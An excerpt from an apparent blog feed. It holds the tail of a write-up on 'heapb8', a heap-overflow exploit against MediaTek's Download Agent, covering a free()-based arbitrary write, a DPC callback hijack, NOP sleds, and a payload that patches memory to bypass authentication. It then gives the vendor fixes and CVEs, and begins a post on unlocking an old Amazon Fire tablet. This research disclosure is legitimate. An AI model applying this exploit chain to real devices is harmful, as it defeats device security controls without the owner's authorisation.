&lt;p&gt;What matters here is &lt;code&gt;str x9, [x8, #0x10]&lt;/code&gt;. It writes &lt;code&gt;alloc.size&lt;/code&gt; to &lt;code&gt;alloc.ptr + 0x10&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If we can control both &lt;code&gt;ptr&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; in the chunk header through our overflow, we get an arbitrary write primitive: &lt;strong&gt;write &lt;code&gt;size&lt;/code&gt; to &lt;code&gt;ptr + 0x10&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Targeting DPC&lt;/h3&gt;
&lt;p&gt;Now we need a target for our write. We need a function pointer at a known address that gets called regularly.&lt;/p&gt;
&lt;p&gt;Looking at the DA2 command loop, we found exactly that: the &lt;strong&gt;DPC (Deferred Procedure Call)&lt;/strong&gt; structure. At the end of each command iteration, the DA checks if there&apos;s a pending callback:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (get_cmd_dpc()-&amp;gt;cb != 0) {
    LOGD(&quot;\n@Protocol: DPC CALL\n&quot;);
    get_cmd_dpc()-&amp;gt;cb(get_cmd_dpc()-&amp;gt;arg);
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The DPC structure is simple:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct cmd_dpc_t {
    const char *key;
    cmd_dpc_cb cb;   // &amp;lt;- function pointer
    void *arg;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It&apos;s used by commands that need to do something &lt;em&gt;after&lt;/em&gt; the command response is sent, like rebooting or switching USB speed. The structure lives at a fixed address in &lt;code&gt;.bss&lt;/code&gt;, and &lt;code&gt;cb&lt;/code&gt; gets called if it&apos;s non-null.&lt;/p&gt;
&lt;p&gt;Perfect target. If we overwrite &lt;code&gt;cb&lt;/code&gt; with our shellcode address, the DA will call it for us at the end of the command loop.&lt;/p&gt;
&lt;p&gt;On our device, the DPC structure lives at:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0x40070030: key
0x40070038: cb    &amp;lt;- function pointer we want to overwrite
0x40070040: arg
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Our overflow writes into the XML filename buffer&apos;s header:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0x4530bda8: ptr  = 0x40070028     (0x10 bytes before dpc-&amp;gt;cb)
0x4530bdb0: size = shellcode_addr
0x4530bdb8: data = &quot;file_name...&quot; (the huge filename)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When the command is aborted, &lt;code&gt;mxmlDelete&lt;/code&gt; cleans up the XML tree and calls &lt;code&gt;free()&lt;/code&gt; on the filename buffer. The corrupted header causes &lt;code&gt;free()&lt;/code&gt; to:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Read &lt;code&gt;ptr = 0x40070028&lt;/code&gt; and &lt;code&gt;size = shellcode_addr&lt;/code&gt; from the header&lt;/li&gt;
&lt;li&gt;Execute &lt;code&gt;str x9, [x8, #0x10]&lt;/code&gt; -&amp;gt; writes &lt;code&gt;shellcode_addr&lt;/code&gt; to &lt;code&gt;0x40070028 + 0x10 = 0x40070038&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0x40070038&lt;/code&gt; is &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt; -&amp;gt; &lt;strong&gt;shellcode address written!&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;After the command ends, the DA&apos;s main loop checks &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt;, sees it&apos;s non-null, and calls it, jumping straight into our shellcode.&lt;/p&gt;
&lt;h1&gt;Putting It All Together&lt;/h1&gt;
&lt;p&gt;So, to recap the full exploit chain:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Send a first AIO command with our shellcode payload&lt;/li&gt;
&lt;li&gt;Send a second AIO command with a crafted filename that shapes the heap&lt;/li&gt;
&lt;li&gt;Advertise a smaller size than we actually send, overflowing into the XML filename buffer&apos;s header&lt;/li&gt;
&lt;li&gt;Set &lt;code&gt;ptr&lt;/code&gt; to &lt;code&gt;DPC - 0x10&lt;/code&gt; and &lt;code&gt;size&lt;/code&gt; to our shellcode address&lt;/li&gt;
&lt;li&gt;Abort the command, triggering &lt;code&gt;mxmlDelete&lt;/code&gt; -&amp;gt; &lt;code&gt;free()&lt;/code&gt; -&amp;gt; arbitrary write&lt;/li&gt;
&lt;li&gt;DPC callback gets overwritten, shellcode executes on next command loop iteration&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We called it &lt;strong&gt;heapb8&lt;/strong&gt; (heapbait), because after getting baited by Chimera&apos;s XML overflow decoy, the name just felt right :).&lt;/p&gt;
&lt;p&gt;The next step was to make the exploit generic across devices and integrate it into &lt;a href=&quot;https://github.com/shomykohai/penumbra&quot;&gt;penumbra&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Predicting the Heap Layout&lt;/h2&gt;
&lt;p&gt;While reimplementing the exploit, we realized the original approach was unnecessarily complicated.&lt;/p&gt;
&lt;p&gt;There are two separate allocations involving the filename:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;mxml_escape&lt;/code&gt; buffer (0x200 bytes, static)&lt;/strong&gt;: Allocated once and reused. The XML expansion overflows this buffer, but since it&apos;s static, it doesn&apos;t affect heap layout at all.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;XML filename node buffer (dynamic)&lt;/strong&gt;: When &lt;code&gt;mxmlLoadString&lt;/code&gt; parses the command, it allocates storage for the filename string. This allocation depends on the filename length &lt;em&gt;before&lt;/em&gt; escaping, and this is what actually shapes the heap.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The original exploit used a filename stuffed with special characters, presumably to trigger the XML expansion.&lt;/p&gt;
&lt;p&gt;But that expansion only affects the static &lt;code&gt;mxml_escape&lt;/code&gt; buffer, it has nothing to do with where the filename node ends up on the heap.&lt;/p&gt;
&lt;p&gt;What actually matters is the size of the filename when &lt;code&gt;mxmlLoadString&lt;/code&gt; sees it. A 5KB filename of &lt;code&gt;&amp;amp;&lt;/code&gt; characters? 5KB node allocation. A 5KB filename of &lt;code&gt;A&lt;/code&gt; characters? Same thing.&lt;/p&gt;
&lt;p&gt;So we simplified, just send a bunch of &lt;code&gt;A&lt;/code&gt;s. We started small; 1KB, 2KB, 3KB and we kept watching the heap through our hooks until the allocations lined up.&lt;/p&gt;
&lt;p&gt;At around 5KB, the XML filename node landed right after our AIO2 buffer, exactly where we needed it.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/different-approaches.png&quot; alt=&quot;Different exploit approaches&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Same result, far less complexity, though as we later learned, the extra complexity with special characters was intentional obfuscation.&lt;/p&gt;
&lt;h2&gt;Landing the Shellcode&lt;/h2&gt;
&lt;p&gt;There&apos;s one more challenge we haven&apos;t addressed: where exactly does our shellcode land?&lt;/p&gt;
&lt;p&gt;The heap base address varies between devices and DA versions. On the Nothing Phone 2A, it starts at &lt;code&gt;0x4007F100&lt;/code&gt;. On other devices, it might be completely different.&lt;/p&gt;
&lt;p&gt;And even on the same device, the exact location of our AIO1 buffer depends on what allocations happened before it.&lt;/p&gt;
&lt;p&gt;We could try to calculate the exact address by analyzing the DA&apos;s initialization sequence, tracking every allocation, and predicting where our shellcode ends up.&lt;/p&gt;
&lt;p&gt;But that&apos;s fragile, any change in the DA&apos;s behavior would break our calculations. Instead, we took the lazy approach: &lt;strong&gt;NOP sleds&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The heap is huge, 800MB on every V6 DA we&apos;ve analyzed. We don&apos;t need to land precisely on our shellcode; we just need to land &lt;em&gt;somewhere&lt;/em&gt; in front of it.&lt;/p&gt;
&lt;p&gt;So we pad our payload with a massive NOP sled (about 10% of the heap size, roughly 80MB of NOPs), then place the actual shellcode at the end. When we overwrite &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt;, we point it near the end of the sled, at 95%.&lt;/p&gt;
&lt;p&gt;If we land anywhere in the sled, execution slides down through the NOPs until it hits our shellcode. As long as our target address is within the sled, we&apos;re good.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/shellcode-chunk.png&quot; alt=&quot;Shellcode chunk with NOP sled&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;We calculate the target address as 95% into the sled, aligned to 4 bytes for ARM:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let sled_size = (heap_params.heap_size / 10) as usize;
let shellcode_addr = (heap_params.heap_base + (sled_size as f64 * 0.95) as u64) &amp;amp; !3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It&apos;s not elegant, but it works reliably across different devices without needing precise heap layout predictions.&lt;/p&gt;
&lt;h2&gt;Hakujoudai&lt;/h2&gt;
&lt;p&gt;With code execution achieved, we needed a payload that would give us persistent control over the DA. We called it &lt;strong&gt;hakujoudai&lt;/strong&gt; (白杖代).&lt;/p&gt;
&lt;p&gt;The name was shomy&apos;s idea, it&apos;s a reference to &lt;a href=&quot;https://hanako-kun.fandom.com/wiki/Tsueshiro&quot;&gt;Toilet-bound Hanako-kun&lt;/a&gt;, where hakujoudai are supernatural orbs used by ghosts to power up, scout, and take control of spaces beyond their reach.&lt;/p&gt;
&lt;p&gt;We thought it fit: we corrupt the heap, leave it for dead, then come back to haunt it.&lt;/p&gt;
&lt;h3&gt;The Problem&lt;/h3&gt;
&lt;p&gt;After the exploit triggers, we have a problem: the heap is corrupted.&lt;/p&gt;
&lt;p&gt;Remember, we overwrote the XML filename buffer&apos;s chunk header with a fake pointer to the DPC region. When &lt;code&gt;free()&lt;/code&gt; processed this corrupted chunk, it inserted our fake &quot;chunk&quot; into the free list.&lt;/p&gt;
&lt;p&gt;Now the heap&apos;s free list contains an entry pointing to &lt;code&gt;0x40070028&lt;/code&gt;, which isn&apos;t heap memory at all.&lt;/p&gt;
&lt;p&gt;If we just ran arbitrary code and returned, the next allocation or free would try to use this corrupted free list and crash. We need to fix the heap before doing anything else.&lt;/p&gt;
&lt;h3&gt;Fixing the Heap&lt;/h3&gt;
&lt;p&gt;The first thing hakujoudai does is repair the damage. It walks the free list and validates each entry.&lt;/p&gt;
&lt;p&gt;If a chunk&apos;s address falls outside the heap region (&lt;code&gt;[heap_base, heap_base + heap_size]&lt;/code&gt;), it&apos;s invalid and gets unlinked:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while (iterations++ &amp;lt; max_iter) {
    bool valid = ptr_valid((uintptr_t)curr, (uintptr_t)head, end);
    
    if (valid) {
        // Keep this chunk in the list
        last_valid-&amp;gt;next = curr;
        curr-&amp;gt;prev = last_valid;
        last_valid = curr;
    } else {
        // Invalid chunk, skip it and clear DPC if needed
        if ((uintptr_t)curr &amp;lt;= base || (uintptr_t)curr &amp;gt; end)
            clear_dpc((uintptr_t)curr);
    }
    
    curr = next;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When we encounter our fake chunk (pointing to DPC), we also clear the DPC structure to prevent the callback from firing again:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void clear_dpc(uintptr_t corrupted_node)
{
    uintptr_t dpc_key_addr = corrupted_node + DPC_KEY_OFFSET;
    memset((void *)dpc_key_addr, 0, DPC_CLEAR_SIZE);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/heap-fix.png&quot; alt=&quot;Heap fixing with hakujoudai&quot; /&gt;
&lt;/div&gt;
&lt;h3&gt;Custom Commands&lt;/h3&gt;
&lt;p&gt;With the heap fixed, we can safely use the DA&apos;s API. Instead of reimplementing USB communication from scratch, we hook into the existing command system:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;register_major_command(&quot;CMD:BOOT-TO&quot;, &quot;1&quot;, cmd_boot_to);
register_major_command(&quot;CMD:EXP-CALL-FUNC&quot;, &quot;1&quot;, cmd_call_function);
register_major_command(&quot;CMD:EXP-PATCH-MEM&quot;, &quot;1&quot;, cmd_patch_mem);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These three commands give us everything we need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;CMD:BOOT-TO&lt;/code&gt;&lt;/strong&gt;: Downloads and executes DA extensions, second-stage payloads that add functionality to the exploited DA.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;CMD:EXP-PATCH-MEM&lt;/code&gt;&lt;/strong&gt;: Writes arbitrary data to any address. Penumbra uses this to patch out security checks directly.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;CMD:EXP-CALL-FUNC&lt;/code&gt;&lt;/strong&gt;: Calls any function at a given address. On devices with DA SLA enabled, most commands are only registered after authentication. We use this to invoke the registration function directly, unlocking all commands without passing SLA.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Returning to the Command Loop&lt;/h3&gt;
&lt;p&gt;The final trick: instead of spinning in our own loop, we return to the DA&apos;s original command loop:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dagent_command_loop2();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This means the DA continues running normally, processing commands as usual, except now it also responds to our custom commands. From the host&apos;s perspective, it&apos;s still talking to a standard V6 DA, just with a few extra capabilities.&lt;/p&gt;
&lt;h3&gt;Dynamic Address Resolution&lt;/h3&gt;
&lt;p&gt;You might have noticed the function pointers look suspicious:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void (*const volatile register_major_command)(...) = (void *)0x11111111;
static void (*const volatile dagent_command_loop2)(void) = (void *)0x22222222;
static volatile uintptr_t heap_struct = 0x33333333;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These are placeholders. Before sending the payload, penumbra analyzes the target DA binary and patches these addresses with the real values:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;patch_pattern_str(&amp;amp;mut payload_bin, &quot;11111111&quot;, &amp;amp;bytes_to_hex(&amp;amp;params.reg_cmd.to_le_bytes()))?;
patch_pattern_str(&amp;amp;mut payload_bin, &quot;22222222&quot;, &amp;amp;bytes_to_hex(&amp;amp;params.cmd_loop.to_le_bytes()))?;
patch_pattern_str(&amp;amp;mut payload_bin, &quot;33333333&quot;, &amp;amp;bytes_to_hex(&amp;amp;params.theheap.to_le_bytes()))?;
// ... etc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This makes hakujoudai work across different DA versions without hardcoding addresses.&lt;/p&gt;
&lt;h1&gt;Results&lt;/h1&gt;
&lt;p&gt;We integrated everything into penumbra. It parses the DA to extract addresses, calculates heap parameters, builds the payload with the right offsets, and sends it off.&lt;/p&gt;
&lt;p&gt;Here&apos;s what it looks like from the host:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/penumbra-heapb8.png&quot; width=&quot;100%&quot; alt=&quot;Penumbra running HeapB8 exploit&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;And on UART, hakujoudai doing its thing, fixing the heap and registering our commands:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/haku.png&quot; width=&quot;70%&quot; alt=&quot;Hakujoudai fixing heap and registering commands&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;After that, penumbra patches out security checks and proceeds normally. Full read/write access, no auth required :)!&lt;/p&gt;
&lt;p&gt;From here you can dump partitions, flash images, or unlock the bootloader on devices where the stock DA would otherwise block you.&lt;/p&gt;
&lt;h1&gt;Fixes&lt;/h1&gt;
&lt;p&gt;MediaTek patched both vulnerabilities sometime in 2025. We don&apos;t know the exact date, but we found two CVEs that appear to match:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/cve-2025-20658&quot;&gt;&lt;strong&gt;CVE-2025-20658&lt;/strong&gt;&lt;/a&gt;: In DA, there is a possible permission bypass due to a logic error. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: &lt;code&gt;ALPS09474894&lt;/code&gt;)&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/cve-2025-20656&quot;&gt;&lt;strong&gt;CVE-2025-20656&lt;/strong&gt;&lt;/a&gt;: In DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: &lt;code&gt;ALPS09625423&lt;/code&gt;)&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We suspect the first one corresponds to the USB overflow since the loop condition was technically correct but logically flawed.&lt;/p&gt;
&lt;p&gt;And the second one matches the XML expansion overflow since it lacked proper bounds checking when writing to the destination buffer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;However, these are just our assumptions based on the descriptions so take them with a grain of salt.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;XML Expansion Fix&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;mxml_escape&lt;/code&gt; function now allocates a properly sized buffer and checks for overflow before each write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define DEST_BUFFER_SIZE (MAX_FILE_NAME_LEN * 6)

if (dest == NULL)
    dest = (char *)malloc(DEST_BUFFER_SIZE);

// ...

for (; i &amp;lt; len; ++i) {
    if ((p - dest) &amp;gt;= (DEST_BUFFER_SIZE - 6)) {
        LOGE(&quot;Dest XML file name buffer overflow&quot;);
        return &quot;&quot;;
    }
    // ... expansion logic ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The buffer is now &lt;code&gt;MAX_FILE_NAME_LEN * 6&lt;/code&gt; to account for worst-case expansion (all &lt;code&gt;&quot;&lt;/code&gt; characters becoming &lt;code&gt;&amp;amp;quot;&lt;/code&gt;), and it bails out if there&apos;s not enough space for another expansion.&lt;/p&gt;
&lt;h3&gt;USB Overflow Fix&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;fp_read_host_file&lt;/code&gt; function now calculates the correct number of bytes to read instead of blindly using &lt;code&gt;package_len&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while (xfered &amp;lt; total_length) {
    // ...
    
    len = total_length - xfered;
    len = len &amp;gt;= package_len ? package_len : len;
    
    if (channel-&amp;gt;read(buf + xfered, (uint32_t *)&amp;amp;len) != 0) {
        // ...
    }
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead of &lt;code&gt;len = package_len&lt;/code&gt;, it now calculates the remaining bytes (&lt;code&gt;total_length - xfered&lt;/code&gt;) and uses whichever is smaller. This prevents reading more data than the buffer can hold.&lt;/p&gt;
&lt;p&gt;The loop condition also changed to prevent issues if &lt;code&gt;xfered&lt;/code&gt; somehow overshoots &lt;code&gt;total_length&lt;/code&gt;.&lt;/p&gt;
&lt;h1&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;This was my first time diving into heap exploitation, and honestly, it was a lot of fun. Frustrating at times, especially those hours wasted on the XML overflow, but incredibly rewarding once everything clicked.&lt;/p&gt;
&lt;p&gt;Working with shomy made the whole process more enjoyable. Neither of us had done anything like this before, so it was a lot of trial and error, and &lt;em&gt;&quot;wait, what if we try this?&lt;/em&gt;&quot; moments. Somehow it all came together!&lt;/p&gt;
&lt;p&gt;Big thanks to &lt;a href=&quot;https://github.com/AntiEngineer&quot;&gt;@AntiEngineer&lt;/a&gt; for the UART work and all the help along the way. Also thanks to &lt;a href=&quot;https://t.me/erdilS&quot;&gt;@erdilS&lt;/a&gt; for lending us the Chimera license that started this whole rabbit hole.&lt;/p&gt;
&lt;p&gt;And of course, credit where it&apos;s due, the Chimera team found the vulnerability, and even though their obfuscation had us chasing ghosts for a while, they deserve recognition for the original discovery.&lt;/p&gt;
&lt;p&gt;The full exploit is available in &lt;a href=&quot;https://github.com/shomykohai/penumbra/blob/main/core/src/exploit/heapbait.rs&quot;&gt;penumbra&lt;/a&gt; and the hakujoudai payload in &lt;a href=&quot;https://github.com/shomykohai/mtk-payloads/tree/main/hakujoudai&quot;&gt;mtk-payloads&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Feel free to reach out on Telegram or mail if you have questions regarding the exploit (&lt;em&gt;technical ones, please, not &quot;how do I unbrick my bricked XYZ.&quot;&lt;/em&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thanks for reading! If you made it this far, we hope it was worth it!&lt;/strong&gt;&lt;/p&gt;
</content:encoded></item><item><title>Hacking a 2014 tablet... in 2024!</title><link>https://blog.r0rt1z2.com/posts/hacking-2014-tablet/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/hacking-2014-tablet/</guid><description>Unlocking the bootloader of the old but gold Amazon Fire HD6 / HD7 2014</description><pubDate>Sun, 21 Jul 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Yes, you heard that right, &lt;strong&gt;10 years after its release&lt;/strong&gt;, I managed to hack and unlock the first MediaTek based Amazon tablet that went on sale, the Amazon Fire HD6 / HD7 2014 (codenamed &lt;code&gt;ariel&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;In this article, I&apos;ll explain my journey in detail without making it too long. If you prefer to skip ahead and see the source code directly (no judgment, I don&apos;t like to read or write much either), you can find it &lt;a href=&quot;https://github.com/R0rt1z2/amonet/tree/mt8135-ariel&quot;&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;::github{repo=&quot;R0rt1z2/amonet&quot; branch=&quot;mt8135-ariel&quot; title=&quot;Amonet fork for MT8135 based devices&quot;}&lt;/p&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;You might be wondering why I decided to tinker with such an old device, especially after so much time has passed since its release. The reason is simple: &lt;strong&gt;its SoC&lt;/strong&gt;. While MediaTek devices are quite common, this tablet features a unique SoC, the &lt;strong&gt;MT8135&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;So, what&apos;s so special about it? Well, nothing much, really. It feels like a tablet version of the MT6595, which was used in phones like the Meizu MX4. The real interest lies in the fact that no one has managed to unlock this device due to its unique quirks which we&apos;ll see as soon as the article develops.&lt;/p&gt;
&lt;h2&gt;Getting the device&lt;/h2&gt;
&lt;p&gt;Although it may sound stupid, the first problem I encountered was finding the device, as it was never sold in Spain. In total, throughout my journey, I acquired two HD7s and two HD6s (one of which eventually died).&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-collection.jpg&quot; width=&quot;60%&quot; alt=&quot;My ariel collection :)&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The first unit was purchased from Wallapop, a popular platform for buying and selling second-hand products in Spain. The two HD7s were bought from eBay and imported directly from the U.S., which cost me quite a bit. The former HD6 was generously donated by kip_dynamite, to whom I owe a huge thanks.&lt;/p&gt;
&lt;h2&gt;Analyzing the firmware&lt;/h2&gt;
&lt;p&gt;As seen on other Amazon devices, this tablet runs a heavily modified version of Android called FireOS. To my surprise, it was released with FireOS 4 (based on Android 4) but received an update to FireOS 5 (based on Android 5.1.1).&lt;/p&gt;
&lt;p&gt;Given that this is such an old device, I assumed its firmware would be similar to the 2015 Fire 7. So, I proceeded to download the latest stock firmware available for this device and extracted it. The result surprised me because something very important seemed to be missing... or at least that was my initial impression.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~/Downloads/update$ tree -L 2
.
├── boot.img
├── file_contexts
├── images
│   ├── lk.bin
│   └── tz.img
├── META-INF
│   ├── CERT.RSA
│   ├── CERT.SF
│   ├── com
│   └── MANIFEST.MF
├── ota.prop
├── system
│   └── build.prop
├── system.new.dat
├── system.patch.dat
└── system.transfer.list

5 directories, 12 files
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In case you haven&apos;t noticed, the Preloader image is missing. As I mentioned before, this device has quite a few special quirks, and this is one of them.&lt;/p&gt;
&lt;p&gt;After realizing the Preloader was missing, I decided to do some research and came across an XDA thread that provided the location of TX and included a few UART logs from an HD6. Fortunately, one of the log links was still working, allowing me to understand how the boot chain worked on this device.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[PL0] Build Time: 20140829-000812
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is the very first line of the log. It looks like the &lt;strong&gt;P&lt;/strong&gt;re&lt;strong&gt;L&lt;/strong&gt;oader printing its build time, but what does that &lt;code&gt;0&lt;/code&gt; stand for? If we read a few more lines, we can find the answer to that question:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[PL0] Build Time: 20140925-030705 
[SD0] Bus Width: 1 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(0) DDR(0) DIV(193) DS(0) RS(0) 
[SD0] Switch to High-Speed mode! 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(2) DDR(1) DIV(96) DS(0) RS(0) 
[SD0] Bus Width: 8 
[SD0] Size: 14910 MB, Max.Speed: 52000 kHz, blklen(512), nblks(30535680), ro(0) 
[SD0] Initialized 
[SD0] SET_CLK(52000kHz): SCLK(50000kHz) MODE(2) DDR(1) DIV(0) DS(0) RS(0) 
msdc_ett_offline_to_pl: size&amp;lt;2&amp;gt; m_id&amp;lt;0x15&amp;gt; 
msdc &amp;lt;0&amp;gt; &amp;lt;HYNIX &amp;gt; &amp;lt;MAG2GC&amp;gt; 
msdc &amp;lt;1&amp;gt; &amp;lt;xxxxxx&amp;gt; &amp;lt;MAG2GC&amp;gt; 
msdc failed to find 
=========use hc erase size 
[PL0] Init MMC: OK(0) 
[ROM_INFO] &apos;v2&apos;,&apos;0x3100000&apos;,&apos;0x20000&apos;,&apos;0x3D80000&apos;,&apos;0x2C00&apos; 
[PART] 1: 00000100 00000040 &apos;PRO_INFO&apos; 
[PART] 2: 00002000 00000800 &apos;PMT&apos; 
[PART] 3: 00002800 00002800 &apos;TEE1&apos; 
[PART] 4: 00002800 00005000 &apos;TEE2&apos; 
[PART] 5: 00000400 00007800 &apos;UBOOT&apos; 
[PART] 6: 00004000 00007C00 &apos;boot_x&apos; 
[PART] 7: 00004000 0000BC00 &apos;recovery_x&apos; 
[PART] 8: 00000800 0000FC00 &apos;KB&apos; 
[PART] 9: 00000800 00010400 &apos;DKB&apos; 
[PART] 10: 00000400 00010C00 &apos;MISC&apos; 
[PART] 11: 00008000 00011000 &apos;persisbackup&apos; 
[PART] 12: 00258000 00019000 &apos;system&apos; 
[PART] 13: 0019A000 00271000 &apos;cache&apos; 
[PART] 14: 0000F000 0040B000 &apos;boot&apos; 
[PART] 15: 0000F000 0041A000 &apos;recovery&apos; 
[PART] 16: 018F3FDF 00429000 &apos;userdata&apos; 
[PL0] loading partition &apos;TEE1&apos; offset=00300000 at address=12001000 
[PART] Image with part header 
[PART] name : PL1 
[PART] addr : FFFFFFFFh 
[PART] size : 112636 
[PART] magic: 58881688h 
[PART] load &quot;2&quot; from 0x0000000001800200 (dev) to 0x12001000 (mem) [SUCCESS] 
[PART] load speed: 21999KB/s, 112636 bytes, 5ms 
[PL0] Load PL1 from  partition &apos;TEE1&apos;@ 8X: err=3145728 
[PL0]RSA2048 signature for PL1[key0]: (img_size 112380) 
[PL0]image verification passed for PL1[key0] 
[PL0] PL1 Load OK from TEE1: err=0 
[PL0] jump to 12001000 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Apparently, Preloader is divided into two different stages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;PL0&lt;/code&gt;: This stage initializes the eMMC, sets up the clock and bus width, and parses the GPT to identify partitions. It then loads and verifies &lt;code&gt;PL1&lt;/code&gt; from the &lt;code&gt;TEE1&lt;/code&gt; partition before jumping to execute it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;PL1&lt;/code&gt;: This stage initializes the PMIC, I2C, performs hardware checks, sets up the RTC, DRAM, and initializes the boot device. It then verifies and loads &lt;code&gt;LK&lt;/code&gt; and &lt;code&gt;TEE&lt;/code&gt; images, performs cryptographic checks, and sets up the boot arguments. Finally, it jumps to the &lt;code&gt;TEE&lt;/code&gt; image to continue the boot process.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With this information, I extracted the latest PL1 image from the &lt;code&gt;tz.img&lt;/code&gt; we previously downloaded. Knowing its offset is &lt;code&gt;0x00300000&lt;/code&gt; (as seen in the UART log), I used UNIX &lt;code&gt;dd&lt;/code&gt; to cut the image:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc $ dd if=tz.img of=PL1.img bs=1 skip=$((0x300000))
113328+0 records in
113328+0 records out
113328 bytes (113 kB, 111 KiB) copied, 0.234714 s, 483 kB/s
r0rt1z2@r0rt1z2-pc $ hexdump -C PL1.img | head -n5
00000000  88 16 88 58 b0 b8 01 00  50 4c 31 00 00 00 00 00  |...X....PL1.....|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
